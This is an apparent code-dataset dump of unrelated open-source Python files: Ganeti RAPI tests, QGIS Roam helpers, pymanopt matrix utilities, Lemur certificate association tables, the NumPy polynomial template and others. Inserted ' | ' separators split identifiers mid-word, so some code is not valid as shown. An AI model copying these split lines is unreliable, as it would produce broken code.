exec_script_lock.acquire()
if current_test.testid in exec_script_pid:
p = exec_script_pid[current_test.testid]
del exec_script_pid[current_test.testid]
exec_script_lock.releas |
yiannist/ganeti | test/py/ganeti.rapi.client_unittest.py | Python | bsd-2-clause | 64,077 | 0.004573 | #!/usr/bin/python
#
# Copyright (C) 2010, 2011 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Script for unittesting the RAPI client module"""
import unittest
import warnings
import pycurl
from ganeti import opcodes
from ganeti import constants
from ganeti import http
from ganeti import serializer
from ganeti import utils
from ganeti import query
from ganeti import objects
from ganeti import rapi
from ganeti import errors
import ganeti.rapi.testutils
from ganeti.rapi import connector
from ganeti.rapi import rlib2
from ganeti.rapi import client
import testutils
# List of resource handlers which aren't used by the RAPI client
_KNOWN_UNUSED = set([
rlib2.R_root,
rlib2.R_2,
])
# Global variable for collecting used handlers
_used_handlers = None
class RapiMock(object):
def __init__(self):
self._mapper = connector.Mapper()
self._responses = []
self._last_handler = None
self._last_req_data = None
def ResetResponses(self):
del self._responses[:]
def AddResponse(self, response, code=200):
self._responses.insert(0, (code, response))
def CountPending(self):
return len(self._responses)
def GetLastHandler(self):
return self._last_handler
def GetLastRequestData(self):
return self._last_req_data
def FetchResponse(self, path, method, headers, request_body):
self._last_req_data = request_body
try:
(handler_cls, items, args) = self._mapper.getController(path)
# Record handler as used
| _used_handlers.add(handler_cls)
self._last_handler = handler_cls(items, args, None)
if not hasattr(self._last_handler, method.upper()):
raise http.HttpNotImplemented(message="Method not implemented")
except http.HttpException, ex:
code = ex.code
respo | nse = ex.message
else:
if not self._responses:
raise Exception("No responses")
(code, response) = self._responses.pop()
return (code, NotImplemented, response)
class TestConstants(unittest.TestCase):
def test(self):
self.assertEqual(client.GANETI_RAPI_PORT, constants.DEFAULT_RAPI_PORT)
self.assertEqual(client.GANETI_RAPI_VERSION, constants.RAPI_VERSION)
self.assertEqual(client.HTTP_APP_JSON, http.HTTP_APP_JSON)
self.assertEqual(client._REQ_DATA_VERSION_FIELD, rlib2._REQ_DATA_VERSION)
self.assertEqual(client.JOB_STATUS_QUEUED, constants.JOB_STATUS_QUEUED)
self.assertEqual(client.JOB_STATUS_WAITING, constants.JOB_STATUS_WAITING)
self.assertEqual(client.JOB_STATUS_CANCELING,
constants.JOB_STATUS_CANCELING)
self.assertEqual(client.JOB_STATUS_RUNNING, constants.JOB_STATUS_RUNNING)
self.assertEqual(client.JOB_STATUS_CANCELED, constants.JOB_STATUS_CANCELED)
self.assertEqual(client.JOB_STATUS_SUCCESS, constants.JOB_STATUS_SUCCESS)
self.assertEqual(client.JOB_STATUS_ERROR, constants.JOB_STATUS_ERROR)
self.assertEqual(client.JOB_STATUS_PENDING, constants.JOBS_PENDING)
self.assertEqual(client.JOB_STATUS_FINALIZED, constants.JOBS_FINALIZED)
self.assertEqual(client.JOB_STATUS_ALL, constants.JOB_STATUS_ALL)
# Node evacuation
self.assertEqual(client.NODE_EVAC_PRI, constants.NODE_EVAC_PRI)
self.assertEqual(client.NODE_EVAC_SEC, constants.NODE_EVAC_SEC)
self.assertEqual(client.NODE_EVAC_ALL, constants.NODE_EVAC_ALL)
# Legacy name
self.assertEqual(client.JOB_STATUS_WAITLOCK, constants.JOB_STATUS_WAITING)
# RAPI feature strings
self.assertEqual(client._INST_CREATE_REQV1, rlib2._INST_CREATE_REQV1)
self.assertEqual(client.INST_CREATE_REQV1, rlib2._INST_CREATE_REQV1)
self.assertEqual(client._INST_REINSTALL_REQV1, rlib2._INST_REINSTALL_REQV1)
self.assertEqual(client.INST_REINSTALL_REQV1, rlib2._INST_REINSTALL_REQV1)
self.assertEqual(client._NODE_MIGRATE_REQV1, rlib2._NODE_MIGRATE_REQV1)
self.assertEqual(client.NODE_MIGRATE_REQV1, rlib2._NODE_MIGRATE_REQV1)
self.assertEqual(client._NODE_EVAC_RES1, rlib2._NODE_EVAC_RES1)
self.assertEqual(client.NODE_EVAC_RES1, rlib2._NODE_EVAC_RES1)
# Error codes
self.assertEqual(client.ECODE_RESOLVER, errors.ECODE_RESOLVER)
self.assertEqual(client.ECODE_NORES, errors.ECODE_NORES)
self.assertEqual(client.ECODE_TEMP_NORES, errors.ECODE_TEMP_NORES)
self.assertEqual(client.ECODE_INVAL, errors.ECODE_INVAL)
self.assertEqual(client.ECODE_STATE, errors.ECODE_STATE)
self.assertEqual(client.ECODE_NOENT, errors.ECODE_NOENT)
self.assertEqual(client.ECODE_EXISTS, errors.ECODE_EXISTS)
self.assertEqual(client.ECODE_NOTUNIQUE, errors.ECODE_NOTUNIQUE)
self.assertEqual(client.ECODE_FAULT, errors.ECODE_FAULT)
self.assertEqual(client.ECODE_ENVIRON, errors.ECODE_ENVIRON)
def testErrors(self):
self.assertEqual(client.ECODE_ALL, errors.ECODE_ALL)
# Make sure all error codes are in both RAPI client and errors module
for name in filter(lambda s: (s.startswith("ECODE_") and s != "ECODE_ALL"),
dir(client)):
value = getattr(client, name)
self.assertEqual(value, getattr(errors, name))
self.assertTrue(value in client.ECODE_ALL)
self.assertTrue(value in errors.ECODE_ALL)
class RapiMockTest(unittest.TestCase):
def test404(self):
(code, _, body) = RapiMock().FetchResponse("/foo", "GET", None, None)
self.assertEqual(code, 404)
self.assertTrue(body is None)
def test501(self):
(code, _, body) = RapiMock().FetchResponse("/version", "POST", None, None)
self.assertEqual(code, 501)
self.assertEqual(body, "Method not implemented")
def test200(self):
rapi = RapiMock()
rapi.AddResponse("2")
(code, _, response) = rapi.FetchResponse("/version", "GET", None, None)
self.assertEqual(200, code)
self.assertEqual("2", response)
self.failUnless(isinstance(rapi.GetLastHandler(), rlib2.R_version))
def _FakeNoSslPycurlVersion():
# Note: incomplete version tuple
return (3, "7.16.0", 462848, "mysystem", 1581, None, 0)
def _FakeFancySslPycurlVersion():
# Note: incomplete version tuple
return (3, "7.16.0", 462848, "mysystem", 1581, "FancySSL/1.2.3", 0)
def _FakeOpenSslPycurlVersion():
# Note: incomplete version tuple
return (2, "7.15.5", 462597, "othersystem", 668, "OpenSSL/0.9.8c", 0)
def _FakeGnuTlsPycurlVersion():
# Note: incomplete version tuple
return (3, "7.18.0", 463360, "somesystem", 1581, "GnuTLS/2.0.4", 0)
class TestExtendedConfig(unittest.TestCase):
def testAuth(self):
cl = client.GanetiRapiClient("master.example.com",
username="user", password="pw",
curl_factory=lambda: rapi.testutils.FakeCurl(RapiMock()))
curl = cl._CreateCurl()
self.assertEqual(curl.getopt(pycurl.HTTPAUTH), pycurl.HTTPAUTH_BASIC)
self.assertEqual(curl.getopt(pycurl.USERPWD), "user:pw")
def testInvalidAuth(self):
# No username
self.assertRaises(client.Error, client.GanetiRapiClient,
|
creative-workflow/pi-setup | test.py | Python | mit | 748 | 0.02139 | import sys, unittest, os
sys.path.append(os.path.realpath(os.path.dirname(__file__))+'/lib')
tests_folder = os.path.realpath(os.path.dirname(__file__))+'/tests'
from tests import ConsoleTestRunner
def load_tests(loader, tests, pattern):
suite = unittest.TestSui | te()
pattern='test_*.py'
for dirname, dirnames, filenames in os.walk(tests_folder):
for path in dirnames:
path=dirname+'/'+path
for all_test_suite in unittest.defaultTestLoader.discover(path, pattern=pattern, top_level_dir=path):
for test_suite in all_test_suite:
suite.addTest(test_suite)
return suite
if __name__ == '__main__':
os.environ['ENVIRONMENT'] = | 'test'
unittest.main(verbosity=2, exit=False, testRunner=ConsoleTestRunner)
|
DMS-Aus/Roam | src/roam/api/utils.py | Python | gpl-2.0 | 8,657 | 0.001733 | import collections
import os
import subprocess
import sys
from contextlib import contextmanager
from PyQt5.QtWidgets import QScroller
from qgis.core import QgsProject, QgsFeatureRequest, QgsGeometry, NULL, Qgis, QgsExpressionContext, \
QgsExpressionContextScope, QgsExpression, QgsFeature
from roam.structs import CaseInsensitiveDict
from roam.utils import warning
def update_feature(layer, *features):
"""
Change feature using the data provider skipping the edit buffer for speed.
:param layer: The layer to get the provider from.
:param features: A list of features to update.
:return: True on success or rasies Expection on fail
"""
featuremap = {}
for feature in features:
attrs = {index: value for index, value in enumerate(feature.attributes())}
featuremap[feature.id()] = attrs
passes = layer.dataProvider().changeAttributeValues(featuremap)
if not passes:
raise FeatureSaveException.not_saved(layer.dataProvider().error().message())
def open_keyboard():
"""
Open the system keyboard
"""
if sys.platform == 'win32':
try:
programfiles = os.environ['ProgramW6432']
except KeyError:
programfiles = os.environ['ProgramFiles']
cmd = r'{path}\Common Files\Microsoft Shared\ink\TabTip.exe'.format(path=programfiles)
try:
os.startfile(cmd)
except WindowsError:
import roam.config
roam.config.settings['keyboard'] = False
roam.config.save()
else:
cmd = 'onboard'
subprocess.Popen(cmd)
def layers(layertype=None):
_layers = QgsProject.instance().mapLayers().values()
if layertype is None:
return _layers
else:
return [layer for layer in _layers if layer.type() == layertype]
def layer_by_name(name):
"""
Return a layer from QGIS using its name.
:param name: The name of the layer
:return: A single layer with the given layer name
"""
try:
return layers_by_name(name)[0]
except IndexError as ex:
warning(f"Can't find layer: {name}")
raise ex
def layers_by_name(name):
"""
Return any layers from QGIS using a name.
:param name: The name of the layer
:return: A list of layers with the given layer name
"""
return QgsProject.instance().mapLayersByName(name)
def feature_by_key(layer, key):
"""
Return the feature for the given key
:param layer: The layer to search
:param key: The mapkey to lookup. This is the feature.id() in QGIS.
:return: The feature found using the mapkey. Will throw StopInteration if not found
"""
rq = QgsFeatureRequest(key)
return next(layer.getFeatures(rq))
class FeatureSaveException(Exception):
def __init__(self, title, message, level, timeout=0, moreinfo=None):
super(FeatureSaveException, self).__init__(self, message)
self.title = title
self.level = level
self.timout = timeout
self.moreinfo = moreinfo
if self.moreinfo:
self.message = message + ':' + str(moreinfo)
else:
self.message = message
@classmethod
def not_accepted(cls):
return cls("Form was not accepted", "The form could not be accepted", Qgis.Warning)
@classmethod
def not_saved(cls, errors):
return cls("Error in saving feature",
"There seems to be a error trying to save the feature",
Qgis.Critical,
moreinfo='\n'.join(errors))
@property
def error(self):
"""
Returns a tuple of the error
"""
return (self.title, self.message, self.level, self.timout, self.moreinfo)
class MissingValuesException(FeatureSaveException):
@classmethod
def missing_values(cls, fields):
html = "<ul>"
for field in fields:
html += "<li>{}</li>".format(field)
html += "</ul>"
return cls("Missing fields", "Some fields are still required. <br> {}".format(html), Qgis.Warning, 2)
@contextmanager
def editing(layer):
layer.startEditing()
yield layer
saved = layer.commitChanges()
if not saved:
layer.rollBack()
errors = layer.commitErrors()
raise FeatureSaveException.not_saved(errors)
def values_from_feature(feature, safe_names=False, ordered=False):
def escape(value):
if safe_names:
value = value.replace(" ", "_")
return value
else:
return value
attributes = feature.attributes()
fields = [escape(field.name().lower()) for field in feature.fields()]
if ordered:
return collections.OrderedDict(zip(fields, attributes))
else:
return CaseInsensitiveDict(zip(fields, attributes))
def copy_feature_values(from_feature, to_feature, include_geom=False):
"""
Copy the values from one feature to another. Missing keys are ignored
:param from_feature: Feature to copy from
:param to_feature: Feature to copy to
:param include_geom: default False, if True will copy the feature geometry
:return: A reference to the to_feature
"""
values = values_from_feature(from_feature)
for field, value in values.items():
try:
to_feature[field] = value
except KeyError:
continue
if include_geom:
geom = QgsGeometry(from_feature.geometry())
to_feature.setGeometry(geom)
return to_feature
def nullcheck(value):
"""
Checks if the value is a null type from QGIS ( NOTE: NULL != null for QgsFeature values).
:param value: The value from the QgsFeature which might be a qgis.core.NULL value
:return: None or the value if the value isn't qgis.core.NULL
"""
if value == NULL:
return None
return value
def format_values(fieldnames, valuestore, with_char='\n'):
"""
Format the given fields with with_char for each.
:param fieldnames: A list of fields to format.
:param valuestore: A dict like store of values
"""
value = []
for field in fieldnames:
try:
if nullcheck(valuestore[field]):
value.append(valuestore[field])
except KeyError:
continue
return with_char.join(value)
def install_touch_scroll(widget) -> None:
"""
Install the touch events on a widget so it can scroll with touch events
:param widget: The widget to install the touch events on.
"""
QScroller.grabGesture(widget, QScroller.TouchGesture)
def replace_expression_placeholders(text:str, feature: QgsFeature):
"""
Replace any QGIS expression placeholders in the given string.
:param text: The text to replace the expression values in.
:param feature: The feature to pull any expression values from.
:return: A string with expression values replaced.
"""
return QgsExpression.replaceExpressionText(text, expression_context_for_feature(feature))
def expression_context_for_feature(feature):
"""
Create a new expression context for the given feature.
:param feature:
:return:
"""
context = QgsExpr | essionContext()
scope = QgsExpressionContextScope( | )
context.appendScope(scope)
if feature is not None:
scope.setVariable("roamgeometry", feature.geometry())
context.setFeature(feature)
return context
def new_expression_context(fields=None):
"""
Create a new expression context with the given fields
:param fields: The fields to use on the expression
:return: The new expression context that can be used with QgsExpression
"""
context = expression_context_for_feature(None)
if fields:
context.setFields(fields)
return context
def search_layer(layer, filter, field_list=None, with_geometry=False):
"""
Search the given layer using the given filter. Only return the fields passed in the field_list.
:param layer: The layer to search
:param filter: The filter to apply to the layer to find matching features.
:param field_list: Only return data for the given fields.
:param with_geometry: If True will also |
ribag/ganeti-experiments | test/py/cmdlib/testsupport/__init__.py | Python | gpl-2.0 | 1,827 | 0 | #
#
# Copyright (C) 2013 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
"""Support classes and functions for te | sting the cmdlib module.
"""
from cmdlib.testsupport.cmdlib_testcase import CmdlibTestCase, \
withLockedL | U
from cmdlib.testsupport.config_mock import ConfigMock
from cmdlib.testsupport.iallocator_mock import patchIAllocator
from cmdlib.testsupport.livelock_mock import LiveLockMock
from cmdlib.testsupport.utils_mock import patchUtils
from cmdlib.testsupport.netutils_mock import patchNetutils, HostnameMock
from cmdlib.testsupport.processor_mock import ProcessorMock
from cmdlib.testsupport.rpc_runner_mock import CreateRpcRunnerMock, \
RpcResultsBuilder
from cmdlib.testsupport.ssh_mock import patchSsh
from cmdlib.testsupport.wconfd_mock import WConfdMock
__all__ = ["CmdlibTestCase",
"withLockedLU",
"ConfigMock",
"CreateRpcRunnerMock",
"HostnameMock",
"patchIAllocator",
"patchUtils",
"patchNetutils",
"patchSsh",
"ProcessorMock",
"RpcResultsBuilder",
"LiveLockMock",
"WConfdMock",
]
|
tingelst/pymanopt | pymanopt/tools/multi.py | Python | bsd-3-clause | 2,443 | 0.000819 | import numpy as np
def multiprod(A, B):
"""
Inspired by MATLAB multiprod function by Paolo de Leva. A and B are
assumed to be arrays containing M matrices, that is, A and B have
dimensions A: (M, N, P), B:(M, P, Q). multiprod multiplies each matrix
in A with the corresponding matrix in B, using matrix multiplication.
so multiprod(A, B) has dimensions (M, N, Q).
"""
# First check if we have been given just one matrix
if len(np.shape(A)) == 2:
return np.dot(A, B)
# Old (slower) implementation:
# a = A.reshape(np.hstack([np.shape(A), [1]]))
# b = B.reshape(np.hstack([[np.shape(B)[0]], [1], np.shape(B)[1:]]))
# | return np.sum(a * b, axis=2)
# Approx 5x faster, only supported by numpy version >= 1.6:
return np.einsum('ijk,ikl->ijl', A, B)
def multitransp(A):
"""
Inspired by MATLAB multitransp function by Paolo de Leva. A is assumed to
be an array containing M matrices, each of which has dimension N x P.
That is, A is an M x N x P array. Mu | ltitransp then returns an array
containing the M matrix transposes of the matrices in A, each of which
will be P x N.
"""
# First check if we have been given just one matrix
if A.ndim == 2:
return A.T
return np.transpose(A, (0, 2, 1))
def multisym(A):
# Inspired by MATLAB multisym function by Nicholas Boumal.
return 0.5 * (A + multitransp(A))
def multiskew(A):
# Inspired by MATLAB multiskew function by Nicholas Boumal.
return 0.5 * (A - multitransp(A))
def multieye(k, n):
# Creates a k x n x n array containing k (n x n) identity matrices.
return np.tile(np.eye(n), (k, 1, 1))
def multilog(A, pos_def=False):
if not pos_def:
raise NotImplementedError
# Computes the logm of each matrix in an array containing k positive
# definite matrices. This is much faster than scipy.linalg.logm even
# for a single matrix. Could potentially be improved further.
l, v = np.linalg.eigh(A)
l = np.expand_dims(np.log(l), axis=-1)
return multiprod(v, l * multitransp(v))
def multiexp(A, sym=False):
if not sym:
raise NotImplementedError
# Compute the expm of each matrix in an array of k symmetric matrices.
# Sometimes faster than scipy.linalg.expm even for a single matrix.
l, v = np.linalg.eigh(A)
l = np.expand_dims(np.exp(l), axis=-1)
return multiprod(v, l * multitransp(v))
|
eternnoir/pyTelegramBotAPI | telebot/storage/__init__.py | Python | gpl-2.0 | 381 | 0.007874 | from telebo | t.storage.memory_storage import StateMemoryStorage
from telebot.storage.redis_storage import StateRedisStorage
from telebot.storage.pickle_storage import StatePickleStorage
from telebot.storage.base_storage import StateContext,StateStorag | eBase
__all__ = [
'StateStorageBase', 'StateContext',
'StateMemoryStorage', 'StateRedisStorage', 'StatePickleStorage'
] |
kevgliss/lemur | lemur/models.py | Python | apache-2.0 | 8,273 | 0.007494 | """
.. module: lemur.models
:platform: Unix
:synopsis: This module contains all of the associative tables
that help define the many to many relationships established in Lemur
:copyright: (c) 2015 by Netflix Inc., see AUTHORS for more
:license: Apache, see LICENSE for more details.
.. moduleauthor:: Kevin Glisson <kglisson@netflix.com>
"""
from sqlalchemy import Column, Integer, ForeignKey, Index, UniqueConstraint
from lemur.database import db
certificate_associations | = db.Table('certificate_associations',
Column('domain_id', Integer | , ForeignKey('domains.id')),
Column('certificate_id', Integer, ForeignKey('certificates.id'))
)
Index('certificate_associations_ix', certificate_associations.c.domain_id, certificate_associations.c.certificate_id)
certificate_destination_associations = db.Table('certificate_destination_associations',
Column('destination_id', Integer,
ForeignKey('destinations.id', ondelete='cascade')),
Column('certificate_id', Integer,
ForeignKey('certificates.id', ondelete='cascade'))
)
Index('certificate_destination_associations_ix', certificate_destination_associations.c.destination_id, certificate_destination_associations.c.certificate_id)
certificate_source_associations = db.Table('certificate_source_associations',
Column('source_id', Integer,
ForeignKey('sources.id', ondelete='cascade')),
Column('certificate_id', Integer,
ForeignKey('certificates.id', ondelete='cascade'))
)
Index('certificate_source_associations_ix', certificate_source_associations.c.source_id, certificate_source_associations.c.certificate_id)
certificate_notification_associations = db.Table('certificate_notification_associations',
Column('notification_id', Integer,
ForeignKey('notifications.id', ondelete='cascade')),
Column('certificate_id', Integer,
ForeignKey('certificates.id', ondelete='cascade')),
Column('id', Integer, primary_key=True, autoincrement=True),
UniqueConstraint('notification_id', 'certificate_id', name='uq_dest_not_ids')
)
Index('certificate_notification_associations_ix', certificate_notification_associations.c.notification_id, certificate_notification_associations.c.certificate_id)
certificate_replacement_associations = db.Table('certificate_replacement_associations',
Column('replaced_certificate_id', Integer,
ForeignKey('certificates.id', ondelete='cascade')),
Column('certificate_id', Integer,
ForeignKey('certificates.id', ondelete='cascade'))
)
Index('certificate_replacement_associations_ix', certificate_replacement_associations.c.replaced_certificate_id, certificate_replacement_associations.c.certificate_id)
roles_authorities = db.Table('roles_authorities',
Column('authority_id', Integer, ForeignKey('authorities.id')),
Column('role_id', Integer, ForeignKey('roles.id'))
)
Index('roles_authorities_ix', roles_authorities.c.authority_id, roles_authorities.c.role_id)
roles_certificates = db.Table('roles_certificates',
Column('certificate_id', Integer, ForeignKey('certificates.id')),
Column('role_id', Integer, ForeignKey('roles.id'))
)
Index('roles_certificates_ix', roles_certificates.c.certificate_id, roles_certificates.c.role_id)
roles_users = db.Table('roles_users',
Column('user_id', Integer, ForeignKey('users.id')),
Column('role_id', Integer, ForeignKey('roles.id'))
)
Index('roles_users_ix', roles_users.c.user_id, roles_users.c.role_id)
policies_ciphers = db.Table('policies_ciphers',
Column('cipher_id', Integer, ForeignKey('ciphers.id')),
Column('policy_id', Integer, ForeignKey('policy.id')))
Index('policies_ciphers_ix', policies_ciphers.c.cipher_id, policies_ciphers.c.policy_id)
pending_cert_destination_associations = db.Table('pending_cert_destination_associations',
Column('destination_id', Integer,
ForeignKey('destinations.id', ondelete='cascade')),
Column('pending_cert_id', Integer,
ForeignKey('pending_certs.id', ondelete='cascade'))
)
Index('pending_cert_destination_associations_ix', pending_cert_destination_associations.c.destination_id, pending_cert_destination_associations.c.pending_cert_id)
pending_cert_notification_associations = db.Table('pending_cert_notification_associations',
Column('notification_id', Integer,
ForeignKey('notifications.id', ondelete='cascade')),
Column('pending_cert_id', Integer,
ForeignKey('pending_certs.id', ondelete='cascade'))
)
Index('pending_cert_notification_associations_ix', pending_cert_notification_associations.c.notification_id, pending_cert_notification_associations.c.pending_cert_id)
pending_cert_source_associations = db.Table('pending_cert_source_associations',
Column('source_id', Integer,
ForeignKey('sources.id', ondelete='cascade')),
Column('pending_cert_id', Integer,
ForeignKey('pending_certs.id', ondelete='cascade'))
)
Index('pending_cert_source_associations_ix', pending_cert_source_associations.c.source_id, pending_cert_source_associations.c.pending_cert_id)
pending_cert_replacement_associations = db.Table('pending_cert_replacement_associations',
Column('replaced_certificate_id', Integer,
ForeignKey('certificates.id', ondelete='cascade')),
Column('pending_cert_id', Integer,
ForeignKey('pending_certs.id', ondelete='cascade'))
)
Index('pending_cert_replacement_associations_ix', pending_cert_replacement_associations.c.replaced_certificate_id, pending_cert_replacement_associations.c.pending_cert_id)
pending_cert_role_associations = db.Table('pending_cert_role_associations',
Column('pending_cert_id', Integer, ForeignKey('pending_certs.id')),
Column('role_id', Integer, ForeignKey('roles.id'))
)
Index('pending_cert_role_associations_ix', |
teoliphant/numpy-refactor | numpy/polynomial/polytemplate.py | Python | bsd-3-clause | 21,267 | 0.000094 | """
Template for the Chebyshev and Polynomial classes.
This module houses a Python string module Template object (see, e.g.,
http://docs.python.org/library/string.html#template-strings) used by
the `polynomial` and `chebyshev` modules to implement their respective
`Polynomial` and `Chebyshev` classes. It provides a mechanism for easily
creating additional specific polynomial classes (e.g., Legendre, Jacobi,
etc.) in the future, such that all these classes will have a common API.
"""
import string
import sys
if sys.version_info[0] >= 3:
rel_import = "from . import"
else:
rel_import = "import"
polytemplate = string.Template('''
from __future__ import division
REL_IMPORT polyutils as pu
import numpy as np
class $name(pu.PolyBase) :
"""A $name series class.
Parameters
----------
coef : array_like
$name coefficients, in increasing order. For example,
``(1, 2, 3)`` implies ``P_0 + 2P_1 + 3P_2`` where the
``P_i`` are a graded polynomial basis.
domain : (2,) array_like
Domain to use. The interval ``[domain[0], domain[1]]`` is mapped to
the interval ``$domain`` by shifting and scaling.
Attributes
----------
coef : (N,) array
$name coefficients, from low to high.
domain : (2,) array_like
Domain that is mapped to ``$domain``.
Class Attributes
----------------
maxpower : int
Maximum power allowed, i.e., the largest number ``n`` such that
``p(x)**n`` is allowed. This is to limit runaway polynomial size.
domain : (2,) ndarray
Default domain of the class.
Notes
-----
It is important to specify the domain for many uses of graded polynomial,
for instance in fitting data. This is because many of the important
properties of the polynomial basis only hold in a specified interval and
thus the data must be mapped into that domain in order to benefit.
Examples
--------
"""
# Limit runaway size. T_n^m has degree n*2^m
maxpower = 16
# Default domain
domain = np.array($domain)
# Don't let participate in array operations. Value doesn't matter.
__array_priority__ = 0
def __init__(self, coef, domain=$domain) :
[coef, domain] = pu.as_series([coef, domain], trim=False)
if len(domain) != 2 :
raise ValueError("Domain has wrong number of elements.")
self.coef = coef
self.domain = domain
def __repr__(self):
format = "%s(%s, %s)"
coef = repr(self.coef)[6:-1]
domain = repr(self.domain)[6:-1]
return format % ('$name', coef, domain)
def __str__(self) :
format = "%s(%s, %s)"
return format % ('$nick', str(self.coef), str(self.domain))
# Pickle and copy
def __getstate__(self) :
ret = self.__dict__.copy()
ret['coef'] = self.coef.copy()
ret['domain'] = self.domain.copy()
return ret
def __setstate__(self, dict) :
self.__dict__ = dict
# Call
def __call__(self, arg) :
off, scl = pu.mapparms(self.domain, $domain)
arg = off + scl*arg
return ${nick}val(arg, self.coef)
def __iter__(self) :
return iter(self.coef)
def __len__(self) :
return len(self.coef)
# Numeric properties.
def __neg__(self) :
retur | n self.__class__(-self.coef, self.domain)
def __pos__(self) :
return self
def __add__(self, other) :
"""Returns sum"""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domai | n) :
coef = ${nick}add(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
coef = ${nick}add(self.coef, other)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __sub__(self, other) :
"""Returns difference"""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
coef = ${nick}sub(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
coef = ${nick}sub(self.coef, other)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __mul__(self, other) :
"""Returns product"""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
coef = ${nick}mul(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
coef = ${nick}mul(self.coef, other)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __div__(self, other):
# set to __floordiv__ /.
return self.__floordiv__(other)
def __truediv__(self, other) :
# there is no true divide if the rhs is not a scalar, although it
# could return the first n elements of an infinite series.
# It is hard to see where n would come from, though.
if isinstance(other, self.__class__) :
if len(other.coef) == 1 :
coef = div(self.coef, other.coef)
else :
return NotImplemented
elif np.isscalar(other) :
coef = self.coef/other
else :
return NotImplemented
return self.__class__(coef, self.domain)
def __floordiv__(self, other) :
"""Returns the quotient."""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
quo, rem = ${nick}div(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
quo, rem = ${nick}div(self.coef, other)
except :
return NotImplemented
return self.__class__(quo, self.domain)
def __mod__(self, other) :
"""Returns the remainder."""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
quo, rem = ${nick}div(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
quo, rem = ${nick}div(self.coef, other)
except :
return NotImplemented
return self.__class__(rem, self.domain)
def __divmod__(self, other) :
"""Returns quo, remainder"""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
quo, rem = ${nick}div(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
quo, rem = ${nick}div(self.coef, other)
except :
return NotImplemented
return self.__class__(quo, self.domain), self.__class__(rem, self.domain)
def __pow__(self, other) :
try :
coef = ${nick}pow(self.coef, other, maxpower = self.maxpower)
except :
raise
return self.__class__(coef, self.domain)
def __radd__(self, other) :
try :
coef = ${nick}add(other, self.coef)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __rsub__(self, other):
try :
coef = ${nick}sub(other, self.coef)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __rmul__(self, other) :
try :
coef = ${nick}mul(other, self.coef)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __rdiv__(self, other):
# set to __floordiv__ /.
return self.__rfloordiv__(other)
def __rtruediv__(self, other) :
# there is no true divide if the rhs is not a scalar, although it
# could return the first n elements of an infinite series.
# It is hard to see where n would come from, th |
atlefren/beerdatabase | web/models.py | Python | mit | 13,140 | 0 | # -*- coding: utf-8 -*-
import json
import sqlalchemy as sa
from sqlalchemy.orm import relationship
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.types import UserDefinedType
from flask.ext.jsontools import JsonSerializableBase
from util import ratebeer_url
Base = declarative_base(cls=(JsonSerializableBase,))
class BeerStyle(Base):
__tablename__ = 'style'
id = sa.Column('id', sa.Integer, primary_key=True)
name = sa.Column('name', sa.U | nicode(255))
class RatebeerCountry(Base):
__tablename__ = 'rb_countries'
id = sa.Column('id', sa.Integer, primary_key=True)
name = sa.Column('name', sa.Unicode(255))
class Country(Base):
__tablename__ = 'countries_no'
rb_id = sa.Column('rb_id', sa.Integer, primary_key=True)
name = sa.Column('name', sa.Unicode(255 | ))
iso_code = sa.Column('iso_code', sa.Unicode(2))
def serialize(self, extra_data=None):
serialized = {
'rb_id': self.rb_id,
'name': self.name,
'iso_code': self.iso_code
}
if isinstance(extra_data, dict):
serialized.update(extra_data)
return serialized
class RatebeerBeer(Base):
__tablename__ = 'rb_beer'
id = sa.Column('id', sa.Integer, primary_key=True)
name = sa.Column('name', sa.Unicode(255))
shortname = sa.Column('shortname', sa.Unicode(255))
alias = sa.Column('alias', sa.Boolean)
retired = sa.Column('retired', sa.Boolean)
style_id = sa.Column('style_id', sa.Integer, sa.ForeignKey('style.id'))
